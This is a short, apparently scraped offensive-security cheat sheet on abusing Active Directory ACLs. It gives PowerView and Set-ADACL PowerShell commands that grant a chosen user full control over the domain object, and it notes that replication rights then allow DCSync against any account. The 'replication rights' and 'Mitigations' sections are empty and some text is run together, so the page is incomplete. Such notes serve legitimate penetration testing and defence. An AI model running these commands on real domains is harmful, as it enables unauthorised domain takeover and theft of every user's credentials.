Abusing ACLs
Useful Commands From Powershell
Give a User Full Control Rights over the Domain Object Itself
# PowerView
Add-ObjectAcl -TargetDistinguishedName 'DC=domain,DC=local' -PrincipalSamAccountName <user> -Rights All -Verbose
# AD Module with Set-ADACL.ps1
Set-ADACL -DistinguishedName 'DC=domain,DC=local' -Principal <user> -VerboseGive a User Replication Rights

You Can Then Run DCSync on Any User You Want Afterwards
Mitigations
Last updated